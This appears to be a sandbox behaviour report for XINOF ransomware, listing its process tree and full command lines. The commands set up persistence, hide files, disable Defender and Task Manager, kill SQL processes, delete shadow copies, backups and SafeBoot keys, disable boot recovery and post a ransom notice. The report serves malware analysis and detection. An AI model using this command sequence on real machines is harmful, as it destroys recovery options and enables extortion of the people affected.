PID 1108 wrote to memory of 1220	1108	cmd.exe	schtasks.exe
PID 1108 wrote to memory of 1220	1108	cmd.exe	schtasks.exe
PID 3160 wrote to memory of 1788	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 1788	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2380	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2380	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 3028	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 3028	3160	XINOF4.2.1.exe	cmd.exe
PID 3028 wrote to memory of 2820	3028	cmd.exe	schtasks.exe
PID 3028 wrote to memory of 2820	3028	cmd.exe	schtasks.exe
PID 3160 wrote to memory of 2916	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2916	3160	XINOF4.2.1.exe	cmd.exe
PID 2916 wrote to memory of 3964	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 3964	2916	cmd.exe	attrib.exe
PID 3160 wrote to memory of 3960	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 3960	3160	XINOF4.2.1.exe	cmd.exe
PID 3960 wrote to memory of 3968	3960	cmd.exe	reg.exe
PID 3960 wrote to memory of 3968	3960	cmd.exe	reg.exe
PID 3160 wrote to memory of 4056	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 4056	3160	XINOF4.2.1.exe	cmd.exe
PID 4056 wrote to memory of 196	4056	cmd.exe	reg.exe
PID 4056 wrote to memory of 196	4056	cmd.exe	reg.exe
PID 3160 wrote to memory of 4080	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 4080	3160	XINOF4.2.1.exe	cmd.exe
PID 4080 wrote to memory of 3192	4080	cmd.exe	reg.exe
PID 4080 wrote to memory of 3192	4080	cmd.exe	reg.exe
PID 3160 wrote to memory of 2940	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2940	3160	XINOF4.2.1.exe	cmd.exe
PID 2940 wrote to memory of 2180	2940	cmd.exe	reg.exe
PID 2940 wrote to memory of 2180	2940	cmd.exe	reg.exe
PID 3160 wrote to memory of 932	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 932	3160	XINOF4.2.1.exe	cmd.exe
PID 932 wrote to memory of 3096	932	cmd.exe	schtasks.exe
PID 932 wrote to memory of 3096	932	cmd.exe	schtasks.exe
PID 3160 wrote to memory of 2708	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2708	3160	XINOF4.2.1.exe	cmd.exe
PID 2708 wrote to memory of 2808	2708	cmd.exe	schtasks.exe
PID 2708 wrote to memory of 2808	2708	cmd.exe	schtasks.exe
PID 3160 wrote to memory of 2084	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2084	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 1860	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 1860	3160	XINOF4.2.1.exe	cmd.exe
PID 2084 wrote to memory of 764	2084	cmd.exe	cmd.exe
PID 2084 wrote to memory of 764	2084	cmd.exe	cmd.exe
PID 1860 wrote to memory of 2796	1860	cmd.exe	reg.exe
PID 1860 wrote to memory of 2796	1860	cmd.exe	reg.exe
PID 3160 wrote to memory of 3124	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 3124	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2928	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 2928	3160	XINOF4.2.1.exe	cmd.exe
PID 3124 wrote to memory of 3964	3124	cmd.exe	cmd.exe
PID 3124 wrote to memory of 3964	3124	cmd.exe	cmd.exe
PID 3160 wrote to memory of 188	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 188	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 1892	3160	XINOF4.2.1.exe	cmd.exe
PID 3160 wrote to memory of 1892	3160	XINOF4.2.1.exe	cmd.exe
PID 764 wrote to memory of 1984	764	cmd.exe	icacls.exe
PID 764 wrote to memory of 1984	764	cmd.exe	icacls.exe

Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1776 attrib.exe
2160
3964 attrib.exe
3892 attrib.exe
1876 attrib.exe
3876 attrib.exe

pid	process
1776	attrib.exe
2160
3964	attrib.exe
3892	attrib.exe
1876	attrib.exe
3876	attrib.exe

C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe
"C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chcp 437
2⤵
- Suspicious use of WriteProcessMemory
PID:636

C:\Windows\system32\chcp.com
chcp 437
3⤵
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
2⤵
PID:1788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
2⤵
PID:2380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F
3⤵
- Creates scheduled task(s)
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
3⤵
- Views/modifies file attributes
PID:3964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /F
3⤵
- Creates scheduled task(s)
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:2084

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1860

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql*
2⤵
- Suspicious use of WriteProcessMemory
PID:3124

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:3964

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpriv.key C:\ProgramData\Cpriv.key
2⤵
PID:2928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpub.key C:\ProgramData\Cpub.key
2⤵
PID:188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID
2⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
2⤵
PID:2388

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
3⤵
PID:1352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
2⤵
PID:3400

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
3⤵
PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails [email protected] [email protected] " /f
2⤵
PID:4036

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails [email protected] [email protected] " /f
3⤵
PID:988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
2⤵
PID:652

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
3⤵
PID:1220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by [email protected] [email protected] DO NOT reply to other emails. ONLY this two emails can help you." /f
2⤵
PID:2324

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by [email protected] [email protected] DO NOT reply to other emails. ONLY this two emails can help you." /f
3⤵
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
2⤵
PID:3892

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
3⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
2⤵
PID:3896

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
3⤵
PID:2652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
2⤵
PID:2928

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:3192

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3028

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:2940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:732

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:2256

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label E: XINOF
2⤵
PID:2004

C:\Windows\system32\label.exe
Label E: XINOF
3⤵
- Enumerates connected drives
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "How To Decrypt Files.hta"
2⤵
- Modifies registry class
PID:3928

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
PID:3488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label F: XINOF
2⤵
PID:1640

C:\Windows\system32\label.exe
Label F: XINOF
3⤵
- Enumerates connected drives
PID:196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label G: XINOF
2⤵
PID:2160

C:\Windows\system32\label.exe
Label G: XINOF
3⤵
- Enumerates connected drives
PID:932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label H: XINOF
2⤵
PID:2284

C:\Windows\system32\label.exe
Label H: XINOF
3⤵
- Enumerates connected drives
PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label I: XINOF
2⤵
PID:2228

C:\Windows\system32\label.exe
Label I: XINOF
3⤵
- Enumerates connected drives
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label J: XINOF
2⤵
PID:736

C:\Windows\system32\label.exe
Label J: XINOF
3⤵
- Enumerates connected drives
PID:2220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label K: XINOF
2⤵
PID:200

C:\Windows\system32\label.exe
Label K: XINOF
3⤵
- Enumerates connected drives
PID:2084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label L: XINOF
2⤵
PID:2916

C:\Windows\system32\label.exe
Label L: XINOF
3⤵
- Enumerates connected drives
PID:3376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label M: XINOF
2⤵
PID:3960

C:\Windows\system32\label.exe
Label M: XINOF
3⤵
- Enumerates connected drives
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label N: XINOF
2⤵
PID:3752

C:\Windows\system32\label.exe
Label N: XINOF
3⤵
- Enumerates connected drives
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label A: XINOF
2⤵
PID:1392

C:\Windows\system32\label.exe
Label A: XINOF
3⤵
- Enumerates connected drives
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label B: XINOF
2⤵
PID:3264

C:\Windows\system32\label.exe
Label B: XINOF
3⤵
- Enumerates connected drives
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label O: XINOF
2⤵
PID:1300

C:\Windows\system32\label.exe
Label O: XINOF
3⤵
- Enumerates connected drives
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label P: XINOF
2⤵
PID:1220

C:\Windows\system32\label.exe
Label P: XINOF
3⤵
- Enumerates connected drives
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Q: XINOF
2⤵
PID:400

C:\Windows\system32\label.exe
Label Q: XINOF
3⤵
- Enumerates connected drives
PID:988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label R: XINOF
2⤵
PID:3336

C:\Windows\system32\label.exe
Label R: XINOF
3⤵
- Enumerates connected drives
PID:2800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label S: XINOF
2⤵
PID:3860

C:\Windows\system32\label.exe
Label S: XINOF
3⤵
- Enumerates connected drives
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label T: XINOF
2⤵
PID:1380

C:\Windows\system32\label.exe
Label T: XINOF
3⤵
- Enumerates connected drives
PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label U: XINOF
2⤵
PID:1856

C:\Windows\system32\label.exe
Label U: XINOF
3⤵
- Enumerates connected drives
PID:1340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label V: XINOF
2⤵
PID:1776

C:\Windows\system32\label.exe
Label V: XINOF
3⤵
- Enumerates connected drives
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label W: XINOF
2⤵
PID:2160

C:\Windows\system32\label.exe
Label W: XINOF
3⤵
- Enumerates connected drives
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label X: XINOF
2⤵
PID:2284

C:\Windows\system32\label.exe
Label X: XINOF
3⤵
- Enumerates connected drives
PID:516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Y: XINOF
2⤵
PID:3932

C:\Windows\system32\label.exe
Label Y: XINOF
3⤵
- Enumerates connected drives
PID:488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Z: XINOF
2⤵
PID:2192

C:\Windows\system32\label.exe
Label Z: XINOF
3⤵
- Enumerates connected drives
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label C: XINOF
2⤵
PID:3968

C:\Windows\system32\label.exe
Label C: XINOF
3⤵
PID:3900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label D: XINOF
2⤵
PID:1704

C:\Windows\system32\label.exe
Label D: XINOF
3⤵
- Enumerates connected drives
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:3752

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:3052

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:3360

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:852

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:800

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:2488

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:180

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:2128

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:1216

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:2160

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s XINOF.exe
2⤵
PID:1364

C:\Windows\system32\attrib.exe
attrib +h +s XINOF.exe
3⤵
- Views/modifies file attributes
PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\XINOF.exe
2⤵
PID:4036

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\XINOF.exe
3⤵
- Views/modifies file attributes
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s Cpub.key
2⤵
PID:1564

C:\Windows\system32\attrib.exe
attrib +h +s Cpub.key
3⤵
- Views/modifies file attributes
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Cpub.key
2⤵
PID:3724

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\Cpub.key
3⤵
- Views/modifies file attributes
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
2⤵
PID:3900

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
3⤵
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
2⤵
PID:268

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
3⤵
PID:284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:400

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:2912

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:3892

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:504

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
2⤵
PID:3964

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
3⤵
PID:2824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:2224

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:1100

C:\Windows\system32\cmd.exe
